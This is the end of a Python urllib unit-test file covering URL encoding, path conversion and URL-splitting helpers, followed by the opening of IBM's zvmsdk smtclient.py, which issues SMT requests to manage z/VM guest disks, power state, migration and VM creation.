(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.quote_plus(str(['1', '2', '3']))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
result = urllib.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
        # Test automatic quoting and unquoting works for pathname2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.quote("quot=ing")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.quote("make sure")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32',
'test specific to the nturl2path library')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
for url in given:
result = urllib.url2pathname(url)
self.assertEqual(expect, result,
'nturl2path.url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.url2pathname(given)
self.assertEqual(expect, result,
'nturl2path.url2pathname() failed; %s != %s' %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
# In Python 3 this test class is moved to test_urlparse.
def test_splittype(self):
splittype = urllib.splittype
self.assertEqual(splittype('type:opaquestring'), ('type', 'opaquestring'))
self.assertEqual(splittype('opaquestring'), (None, 'opaquestring'))
self.assertEqual(splittype(':opaquestring'), (None, ':opaquestring'))
self.assertEqual(splittype('type:'), ('type', ''))
self.assertEqual(splittype('type:opaque:string'), ('type', 'opaque:string'))
def test_splithost(self):
splithost = urllib.splithost
self.assertEqual(splithost('//www.example.org:80/foo/bar/baz.html'),
('www.example.org:80', '/foo/bar/baz.html'))
self.assertEqual(splithost('//www.example.org:80'),
('www.example.org:80', ''))
self.assertEqual(splithost('/foo/bar/baz.html'),
(None, '/foo/bar/baz.html'))
# bpo-30500: # starts a fragment.
self.assertEqual(splithost('//127.0.0.1#@host.com'),
('127.0.0.1', '/#@host.com'))
self.assertEqual(splithost('//127.0.0.1#@host.com:80'),
('127.0.0.1', '/#@host.com:80'))
self.assertEqual(splithost('//127.0.0.1:80#@host.com'),
('127.0.0.1:80', '/#@host.com'))
# Empty host is returned as empty string.
self.assertEqual(splithost("///file"),
('', '/file'))
# Trailing semicolon, question mark and hash symbol are kept.
self.assertEqual(splithost("//example.net/file;"),
('example.net', '/file;'))
self.assertEqual(splithost("//example.net/file?"),
('example.net', '/file?'))
self.assertEqual(splithost("//example.net/file#"),
('example.net', '/file#'))
def test_splituser(self):
splituser = urllib.splituser
self.assertEqual(splituser('User:Pass@www.python.org:080'),
('User:Pass', 'www.python.org:080'))
self.assertEqual(splituser('@www.python.org:080'),
('', 'www.python.org:080'))
self.assertEqual(splituser('www.python.org:080'),
(None, 'www.python.org:080'))
self.assertEqual(splituser('User:Pass@'),
('User:Pass', ''))
self.assertEqual(splituser('User@example.com:Pass@www.python.org:080'),
('User@example.com:Pass', 'www.python.org:080'))
def test_splitpasswd(self):
        # Some of the password examples are not sensible, but they are added
        # to conform to RFC 2617 and to address issue 4675.
splitpasswd = urllib.splitpasswd
self.assertEqual(splitpasswd('user:ab'), ('user', 'ab'))
self.assertEqual(splitpasswd('user:a\nb'), ('user', 'a\nb'))
self.assertEqual(splitpasswd('user:a\tb'), ('user', 'a\tb'))
self.assertEqual(splitpasswd('user:a\rb'), ('user', 'a\rb'))
self.assertEqual(splitpasswd('user:a\fb'), ('user', 'a\fb'))
self.assertEqual(splitpasswd('user:a\vb'), ('user', 'a\vb'))
self.assertEqual(splitpasswd('user:a:b'), ('user', 'a:b'))
self.assertEqual(splitpasswd('user:a b'), ('user', 'a b'))
self.assertEqual(splitpasswd('user 2:ab'), ('user 2', 'ab'))
self.assertEqual(splitpasswd('user+1:a+b'), ('user+1', 'a+b'))
self.assertEqual(splitpasswd('user:'), ('user', ''))
self.assertEqual(splitpasswd('user'), ('user', None))
self.assertEqual(splitpasswd(':ab'), ('', 'ab'))
def test_splitport(self):
splitport = urllib.splitport
self.assertEqual(splitport('parrot:88'), ('parrot', '88'))
self.assertEqual(splitport('parrot'), ('parrot', None))
self.assertEqual(splitport('parrot:'), ('parrot', None))
self.assertEqual(splitport('127.0.0.1'), ('127.0.0.1', None))
self.assertEqual(splitport('parrot:cheese'), ('parrot:cheese', None))
self.assertEqual(splitport('[::1]:88'), ('[::1]', '88'))
self.assertEqual(splitport('[::1]'), ('[::1]', None))
self.assertEqual(splitport(':88'), ('', '88'))
def test_splitnport(self):
splitnport = urllib.splitnport
self.assertEqual(splitnport('parrot:88'), ('parrot', 88))
self.assertEqual(splitnport('parrot'), ('parrot', -1))
self.assertEqual(splitnport('parrot', 55), ('parrot', 55))
self.assertEqual(splitnport('parrot:'), ('parrot', -1))
self.assertEqual(splitnport('parrot:', 55), ('parrot', 55))
self.assertEqual(splitnport('127.0.0.1'), ('127.0.0.1', -1))
self.assertEqual(splitnport('127.0.0.1', 55), ('127.0.0.1', 55))
self.assertEqual(splitnport('parrot:cheese'), ('parrot', None))
self.assertEqual(splitnport('parrot:cheese', 55), ('parrot', None))
def test_splitquery(self):
# Normal cases are exercised by other tests; ensure that we also
        # catch cases with no query specified (testcase ensuring coverage)
splitquery = urllib.splitquery
self.assertEqual(splitquery('http://python.org/fake?foo=bar'),
('http://python.org/fake', 'foo=bar'))
self.assertEqual(splitquery('http://python.org/fake?foo=bar?'),
('http://python.org/fake?foo=bar', ''))
self.assertEqual(splitquery('http://python.org/fake'),
('http://python.org/fake', None))
self.assertEqual(splitquery('?foo=bar'), ('', 'foo=bar'))
def test_splittag(self):
splittag = urllib.splittag
self.assertEqual(splittag('http://example.com?foo=bar#baz'),
('http://example.com?foo=bar', 'baz'))
self.assertEqual(splittag('http://example.com?foo=bar#'),
('http://example.com?foo=bar', ''))
self.assertEqual(splittag('#baz'), ('', 'baz'))
self.assertEqual(splittag('http://example.com?foo=bar'),
('http://example.com?foo=bar', None))
self.assertEqual(splittag('http://example.com?foo=bar#baz#boo'),
('http://example.com?foo=bar#baz', 'boo'))
def test_splitattr(self):
splitattr = urllib.splitattr
self.assertEqual(splitattr('/path;attr1=value1;attr2=value2'),
('/path', ['attr1=value1', 'attr2=value2']))
self.assertEqual(splitattr('/path;'), ('/path', ['']))
self.assertEqual(splitattr(';attr1=value1;attr2=value2'),
('', ['attr1=value1', 'attr2=value2']))
self.assertEqual(splitattr('/path'), ('/path', []))
def test_splitvalue(self):
# Normal cases are exercised by other tests; test pathological cases
# with no key/value pairs. (testcase ensuring coverage)
splitvalue = urllib.splitvalue
self.assertEqual(splitvalue('foo=bar'), ('foo', 'bar'))
self.assertEqual(splitvalue('foo='), ('foo', ''))
self.assertEqual(splitvalue('=bar'), ('', 'bar'))
self.assertEqual(splitvalue('foobar'), ('foobar', None))
self.assertEqual(splitvalue('foo=bar=baz'), ('foo', 'bar=baz'))
def test_toBytes(self):
result = urllib.toBytes(u'http://www.python.org')
self.assertEqual(result, 'http://www.python.org')
self.assertRaises(UnicodeError, urllib.toBytes,
test_support.u(r'http://www.python.org/medi\u00e6val'))
def test_unwrap(self):
url = urllib.unwrap('<URL:type://host/path>')
self.assertEqual(url, 'type://host/path')
class URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.URLopener):
def open_spam(self, url):
return url
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
# Just commented them out.
# Can't really tell why keep failing in windows and sparc.
# Everywhere else they work ok, but on those machines, sometimes
# fail in one of the tests, sometimes in other. I have a linux, and
# the tests go ok.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen(5)
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
def test_main():
import warnings
with warnings.catch_warnings():
warnings.filterwarnings('ignore', ".*urllib\.urlopen.*Python 3.0",
DeprecationWarning)
test_support.run_unittest(
urlopen_FileTests,
urlopen_HttpTests,
urlretrieve_FileTests,
urlretrieve_HttpTests,
ProxyTests,
QuotingTests,
UnquotingTests,
urlencode_Tests,
Pathname_Tests,
Utility_Tests,
URLopener_Tests,
ProxyTests,
ProxyTests_withOrderedEnv,
#FTPWrapperTests,
)
if __name__ == '__main__':
test_main()
|
smtclient.py
|
# Copyright 2017,2020 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import hashlib
import math
# On SLES12, we found that if you import urllib.parse later
# than requests, you will hit an error like 'not able to load
# urllib.parse'; this is because urllib will already be in sys.modules
# when requests is imported first.
# As a workaround, we first import urllib and then import requests.
# Later, we should consider using urllib.request to replace requests,
# if possible, to avoid this kind of issue.
from io import IOBase
import shutil
import six.moves.urllib.parse as urlparse
import requests
import threading
import os
import re
import six
import string
import subprocess
import tempfile
from smtLayer import smt
from zvmsdk import config
from zvmsdk import constants as const
from zvmsdk import database
from zvmsdk import exception
from zvmsdk import log
from zvmsdk import returncode
from zvmsdk import utils as zvmutils
CONF = config.CONF
LOG = log.LOG
_LOCK = threading.Lock()
CHUNKSIZE = 4096
_SMT_CLIENT = None
def get_smtclient():
global _SMT_CLIENT
if _SMT_CLIENT is None:
try:
_SMT_CLIENT = zvmutils.import_object(
'zvmsdk.smtclient.SMTClient')
except ImportError:
LOG.error("Unable to get smtclient")
raise ImportError
return _SMT_CLIENT
class SMTClient(object):
def __init__(self):
self._smt = smt.SMT()
self._pathutils = zvmutils.PathUtils()
self._NetDbOperator = database.NetworkDbOperator()
self._GuestDbOperator = database.GuestDbOperator()
self._ImageDbOperator = database.ImageDbOperator()
def _request(self, requestData):
try:
results = self._smt.request(requestData)
except Exception as err:
LOG.error('SMT internal parse encounter error')
raise exception.SDKInternalError(msg=err, modID='smt')
def _is_smt_internal_error(results):
internal_error_list = returncode.SMT_INTERNAL_ERROR
for error in internal_error_list:
if results['overallRC'] != error[0]:
# overallRC does not match, continue next
continue
if error[1] is not None and results['rc'] != error[1]:
# rc match failed
continue
if error[2] is not None and results['rs'] not in error[2]:
# rs match failed
continue
# All match finish successfully, return true
return True
return False
if results['overallRC'] != 0:
results.pop('logEntries')
# Check whether this smt error belongs to internal error, if so,
# raise internal error, otherwise raise clientrequestfailed error
if _is_smt_internal_error(results):
msg = "SMT internal error. Results: %s" % str(results)
LOG.error(msg)
raise exception.SDKInternalError(msg=msg,
modID='smt',
results=results)
else:
msg = ("SMT request failed. RequestData: '%s', Results: '%s'"
% (requestData, str(results)))
raise exception.SDKSMTRequestFailed(results, msg)
return results
def get_guest_temp_path(self, userid):
return self._pathutils.get_guest_temp_path(userid)
def get_guest_path(self, userid):
return self._pathutils.get_guest_path(userid)
def clean_temp_folder(self, tmp_folder):
return self._pathutils.clean_temp_folder(tmp_folder)
def _generate_vdev(self, base, offset):
"""Generate virtual device number based on base vdev
        :param base: base virtual device number, a 4-digit hex string.
:param offset: offset to base, integer.
"""
vdev = hex(int(base, 16) + offset)[2:]
return vdev.rjust(4, '0')
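    # For example, _generate_vdev('0100', 3) returns '0103' and
    # _generate_vdev('0fff', 1) returns '1000'.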
def _generate_increasing_nic_id(self, nic_id):
"""Generate increasing nic id string
:param nic_id: hexadecimal nic id like '1000'
:return: increasing nic id, string like '0.0.1000,0.0.1001,0.0.1002'
"""
nic_id = str(hex(int(nic_id, 16)))[2:]
nic_id_1 = str(hex(int(nic_id, 16) + 1))[2:]
nic_id_2 = str(hex(int(nic_id, 16) + 2))[2:]
if len(nic_id_2) > 4:
errmsg = ("Virtual device number %s is not valid" % nic_id_2)
raise exception.SDKInvalidInputFormat(msg=errmsg)
return "0.0.%s,0.0.%s,0.0.%s" % (nic_id, nic_id_1, nic_id_2)
def generate_disk_vdev(self, start_vdev=None, offset=0):
"""Generate virtual device number for disks
:param offset: offset of user_root_vdev.
        :return: virtual device number, a 4-digit hex string.
"""
if not start_vdev:
start_vdev = CONF.zvm.user_root_vdev
vdev = self._generate_vdev(start_vdev, offset)
if offset >= 0 and offset < 254:
return vdev
else:
msg = ("Failed to generate disk vdev, invalid virtual device"
"number for disk:%s" % vdev)
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=2, msg=msg)
def add_mdisks(self, userid, disk_list, start_vdev=None):
"""Add disks for the userid
        :disks: A list of dictionaries describing disk info, for example:
disk: [{'size': '1g',
'format': 'ext3',
'disk_pool': 'ECKD:eckdpool1'}]
"""
for idx, disk in enumerate(disk_list):
if 'vdev' in disk:
# this means user want to create their own device number
vdev = disk['vdev']
else:
vdev = self.generate_disk_vdev(start_vdev=start_vdev,
offset=idx)
self._add_mdisk(userid, disk, vdev)
disk['vdev'] = vdev
if disk.get('disk_pool') is None:
disk['disk_pool'] = CONF.zvm.disk_pool
sizeUpper = disk.get('size').strip().upper()
sizeUnit = sizeUpper[-1]
if sizeUnit != 'G' and sizeUnit != 'M':
sizeValue = sizeUpper
disk_pool = disk.get('disk_pool')
[diskpool_type, diskpool_name] = disk_pool.split(':')
if (diskpool_type.upper() == 'ECKD'):
# Convert the cylinders to bytes
convert = 737280
else:
# Convert the blocks to bytes
convert = 512
byteSize = float(float(int(sizeValue) * convert / 1024) / 1024)
unit = "M"
if (byteSize > 1024):
byteSize = float(byteSize / 1024)
unit = "G"
byteSize = "%.1f" % byteSize
disk['size'] = byteSize + unit
return disk_list
def remove_mdisks(self, userid, vdev_list):
for vdev in vdev_list:
self._remove_mdisk(userid, vdev)
def dedicate_device(self, userid, vaddr, raddr, mode):
"""dedicate device
:userid: The name of the image obtaining a dedicated device
:vaddr: The virtual device number of the device
:raddr: A real device number to be dedicated or attached
to the specified image
:mode: Specify a 1 if the virtual device is to be in read-only mode.
Otherwise, specify a 0.
"""
# dedicate device to directory entry
self._dedicate_device(userid, vaddr, raddr, mode)
def _dedicate_device(self, userid, vaddr, raddr, mode):
"""dedicate device."""
action = 'dedicate'
rd = ('changevm %(uid)s %(act)s %(va)s %(ra)s %(mod)i' %
{'uid': userid, 'act': action,
'va': vaddr, 'ra': raddr, 'mod': mode})
action = "dedicate device to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_fcp_info_by_status(self, userid, status):
"""get fcp information by the status.
:userid: The name of the image to query fcp info
:status: The status of target fcps. eg:'active', 'free' or 'offline'.
"""
results = self._get_fcp_info_by_status(userid, status)
return results
def _get_fcp_info_by_status(self, userid, status):
action = 'fcpinfo'
rd = ' '.join(['getvm', userid, action, status])
action = "query fcp info of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
return results['response']
def undedicate_device(self, userid, vaddr):
"""undedicate device
:userid: The name of the image obtaining a dedicated device
:vaddr: The virtual device number of the device
"""
# undedicate device to directory entry
self._undedicate_device(userid, vaddr)
def _undedicate_device(self, userid, vaddr):
"""undedicate device."""
action = 'undedicate'
rd = ('changevm %(uid)s %(act)s %(va)s' %
{'uid': userid, 'act': action,
'va': vaddr})
action = "undedicate device from userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_image_performance_info(self, userid):
"""Get CPU and memory usage information.
:userid: the zvm userid to be queried
"""
pi_dict = self.image_performance_query([userid])
return pi_dict.get(userid, None)
def get_adapters_info(self, userid):
rd = ' '.join((
"SMAPI %s API Virtual_Network_Adapter_Query_Extended" % userid,
"--operands",
"-k 'image_device_number=*'"))
results = None
action = "get network info of userid '%s'" % str(userid)
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ret = results['response']
        # TODO: multi NIC support?
nic_count = 0
for line in ret:
if 'adapter_count=' in line:
nic_count = int(line.strip().split('=')[-1])
break
if nic_count < 1:
msg = 'get_network_info:No NIC found on userid %s' % userid
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
# save network info into dict by index from 1 to nic_count
# Firstly, get adapter information
adapters_info = []
adapter = dict()
        # once an IP is found for an adapter, skip its remaining MAC lines
found_mac = False
for line in ret:
if 'adapter_address=' in line:
adapter_addr = line.strip().split('=')[-1]
adapter['adapter_address'] = adapter_addr
if 'adapter_status=' in line:
adapter_type = line.strip().split('=')[-1]
adapter['adapter_status'] = adapter_type
if 'lan_owner=' in line:
lan_owner = line.strip().split('=')[-1]
adapter['lan_owner'] = lan_owner
if 'lan_name=' in line:
lan_name = line.strip().split('=')[-1]
adapter['lan_name'] = lan_name
if 'mac_address=' in line and not found_mac:
mac_addr = line.strip().split('=')[-1]
pattern = re.compile('.{2}')
mac_address = ':'.join(pattern.findall(mac_addr))
adapter['mac_address'] = mac_address
if 'mac_ip_version=' in line:
ip_version = line.strip().split('=')[-1]
adapter['mac_ip_version'] = ip_version
if 'mac_ip_address=' in line:
# once we found mac_ip_address, assume this is the MAC
# we are using, then jump to next adapter
mac_ip = line.strip().split('=')[-1]
adapter['mac_ip_address'] = mac_ip
found_mac = True
if 'adapter_info_end' in line:
adapters_info.append(adapter)
# clear adapter and process next
adapter = dict()
found_mac = False
return adapters_info
def _parse_vswitch_inspect_data(self, rd_list):
""" Parse the Virtual_Network_Vswitch_Query_Byte_Stats data to get
inspect data.
"""
def _parse_value(data_list, idx, keyword, offset):
return idx + offset, data_list[idx].rpartition(keyword)[2].strip()
vsw_dict = {}
with zvmutils.expect_invalid_resp_data():
# vswitch count
idx = 0
idx, vsw_count = _parse_value(rd_list, idx, 'vswitch count:', 2)
vsw_dict['vswitch_count'] = int(vsw_count)
# deal with each vswitch data
vsw_dict['vswitches'] = []
for i in range(vsw_dict['vswitch_count']):
vsw_data = {}
# skip vswitch number
idx += 1
# vswitch name
idx, vsw_name = _parse_value(rd_list, idx, 'vswitch name:', 1)
vsw_data['vswitch_name'] = vsw_name
# uplink count
idx, up_count = _parse_value(rd_list, idx, 'uplink count:', 1)
# skip uplink data
idx += int(up_count) * 9
# skip bridge data
idx += 8
# nic count
vsw_data['nics'] = []
idx, nic_count = _parse_value(rd_list, idx, 'nic count:', 1)
nic_count = int(nic_count)
for j in range(nic_count):
nic_data = {}
idx, nic_id = _parse_value(rd_list, idx, 'nic_id:', 1)
userid, toss, vdev = nic_id.partition(' ')
nic_data['userid'] = userid
nic_data['vdev'] = vdev
idx, nic_data['nic_fr_rx'] = _parse_value(rd_list, idx,
'nic_fr_rx:', 1
)
idx, nic_data['nic_fr_rx_dsc'] = _parse_value(rd_list, idx,
'nic_fr_rx_dsc:', 1
)
idx, nic_data['nic_fr_rx_err'] = _parse_value(rd_list, idx,
'nic_fr_rx_err:', 1
)
idx, nic_data['nic_fr_tx'] = _parse_value(rd_list, idx,
'nic_fr_tx:', 1
)
idx, nic_data['nic_fr_tx_dsc'] = _parse_value(rd_list, idx,
'nic_fr_tx_dsc:', 1
)
idx, nic_data['nic_fr_tx_err'] = _parse_value(rd_list, idx,
'nic_fr_tx_err:', 1
)
idx, nic_data['nic_rx'] = _parse_value(rd_list, idx,
'nic_rx:', 1
)
idx, nic_data['nic_tx'] = _parse_value(rd_list, idx,
'nic_tx:', 1
)
vsw_data['nics'].append(nic_data)
# vlan count
idx, vlan_count = _parse_value(rd_list, idx, 'vlan count:', 1)
# skip vlan data
idx += int(vlan_count) * 3
# skip the blank line
idx += 1
vsw_dict['vswitches'].append(vsw_data)
return vsw_dict
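    # Illustrative sketch of the structure returned by
    # _parse_vswitch_inspect_data (values are hypothetical):
    # {'vswitch_count': 1,
    #  'vswitches': [{'vswitch_name': 'VSW1',
    #                 'nics': [{'userid': 'TESTID', 'vdev': '1000',
    #                           'nic_fr_rx': '0', 'nic_fr_rx_dsc': '0',
    #                           'nic_fr_rx_err': '0', 'nic_fr_tx': '0',
    #                           'nic_fr_tx_dsc': '0', 'nic_fr_tx_err': '0',
    #                           'nic_rx': '0', 'nic_tx': '0'}]}]}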
def _is_vdev_valid(self, vdev, vdev_info):
for used_vdev in vdev_info:
if (((int(vdev, 16) >= int(used_vdev, 16)) and
(int(vdev, 16) <= int(used_vdev, 16) + 2)) or
((int(vdev, 16) < int(used_vdev, 16)) and
(int(vdev, 16) >= int(used_vdev, 16) - 2))):
return False
return True
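    # A worked example of the vdev validity check above, using hypothetical
    # addresses: a candidate vdev is rejected when it falls within 2 device
    # numbers of any in-use vdev. If '1000' is already used, then
    # '0FFE'..'1002' are all rejected, while '1003' (0x1003 > 0x1000 + 2)
    # is accepted.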
def get_power_state(self, userid):
"""Get power status of a z/VM instance."""
LOG.debug('Querying power stat of %s' % userid)
requestData = "PowerVM " + userid + " status"
action = "query power state of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(requestData)
with zvmutils.expect_invalid_resp_data(results):
status = results['response'][0].partition(': ')[2]
return status
def _check_power_state(self, userid, action):
# Get the vm status
power_state = self.get_power_state(userid)
# Power on the vm if it is inactive
if power_state == 'off':
            msg = ('The vm %s is powered off, please start it up '
                   'before %s' % (userid, action))
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
def guest_start(self, userid):
"""Power on VM."""
requestData = "PowerVM " + userid + " on"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_stop(self, userid, **kwargs):
"""Power off VM."""
requestData = "PowerVM " + userid + " off"
if 'timeout' in kwargs.keys() and kwargs['timeout']:
requestData += ' --maxwait ' + str(kwargs['timeout'])
if 'poll_interval' in kwargs.keys() and kwargs['poll_interval']:
requestData += ' --poll ' + str(kwargs['poll_interval'])
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_softstop(self, userid, **kwargs):
"""Power off VM gracefully, it will call shutdown os then
deactivate vm"""
requestData = "PowerVM " + userid + " softoff --wait"
if 'timeout' in kwargs.keys() and kwargs['timeout']:
requestData += ' --maxwait ' + str(kwargs['timeout'])
else:
requestData += ' --maxwait ' + str(CONF.guest.softstop_timeout)
if 'poll_interval' in kwargs.keys() and kwargs['poll_interval']:
requestData += ' --poll ' + str(kwargs['poll_interval'])
else:
requestData += ' --poll ' + str(CONF.guest.softstop_interval)
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
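    # For illustration (hypothetical values): guest_softstop('TESTID',
    # timeout=300, poll_interval=20) would build the request string
    # 'PowerVM TESTID softoff --wait --maxwait 300 --poll 20'; when the
    # keyword arguments are omitted, the CONF.guest defaults are used
    # instead.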
def guest_pause(self, userid):
self._check_power_state(userid, 'pause')
requestData = "PowerVM " + userid + " pause"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_unpause(self, userid):
self._check_power_state(userid, 'unpause')
requestData = "PowerVM " + userid + " unpause"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_reboot(self, userid):
requestData = ' '.join(("PowerVM", userid, "reboot"))
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_reset(self, userid):
requestData = ' '.join(("PowerVM", userid, "reset"))
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def live_migrate_move(self, userid, destination, parms):
""" moves the specified virtual machine, while it continues to run,
to the specified system within the SSI cluster. """
rd = ('migratevm %(uid)s move --destination %(dest)s ' %
{'uid': userid, 'dest': destination})
        if 'maxtotal' in parms:
            rd += ('--maxtotal ' + str(parms['maxtotal']))
if 'maxquiesce' in parms:
rd += ('--maxquiesce ' + str(parms['maxquiesce']))
if 'immediate' in parms:
rd += " --immediate"
if 'forcearch' in parms:
rd += " --forcearch"
if 'forcedomain' in parms:
rd += " --forcedomain"
if 'forcestorage' in parms:
rd += " --forcestorage"
action = "move userid '%s' to SSI '%s'" % (userid, destination)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
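    # Illustrative request built by live_migrate_move (hypothetical values):
    # live_migrate_move('TESTID', 'SSIMEMB2', {'maxtotal': 10, 'immediate': ''})
    # results in the string
    # 'migratevm TESTID move --destination SSIMEMB2 --maxtotal 10 --immediate'.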
def live_migrate_test(self, userid, destination):
""" tests the specified virtual machine and reports whether or not
it is eligible to be relocated to the specified system. """
rd = ('migratevm %(uid)s test --destination %(dest)s ' %
{'uid': userid, 'dest': destination})
action = "test to move userid '%s' to SSI '%s'" % (userid, destination)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
def _get_ipl_param(self, ipl_from):
if len(ipl_from) > 0:
ipl_param = ipl_from
else:
ipl_param = CONF.zvm.user_root_vdev
return ipl_param
def create_vm(self, userid, cpu, memory, disk_list, profile,
max_cpu, max_mem, ipl_from, ipl_param, ipl_loadparam,
dedicate_vdevs, loaddev):
""" Create VM and add disks if specified. """
rd = ('makevm %(uid)s directory LBYONLY %(mem)im %(pri)s '
'--cpus %(cpu)i --profile %(prof)s --maxCPU %(max_cpu)i '
'--maxMemSize %(max_mem)s --setReservedMem' %
{'uid': userid, 'mem': memory,
'pri': const.ZVM_USER_DEFAULT_PRIVILEGE,
'cpu': cpu, 'prof': profile,
'max_cpu': max_cpu, 'max_mem': max_mem})
if CONF.zvm.default_admin_userid:
rd += (' --logonby "%s"' % CONF.zvm.default_admin_userid)
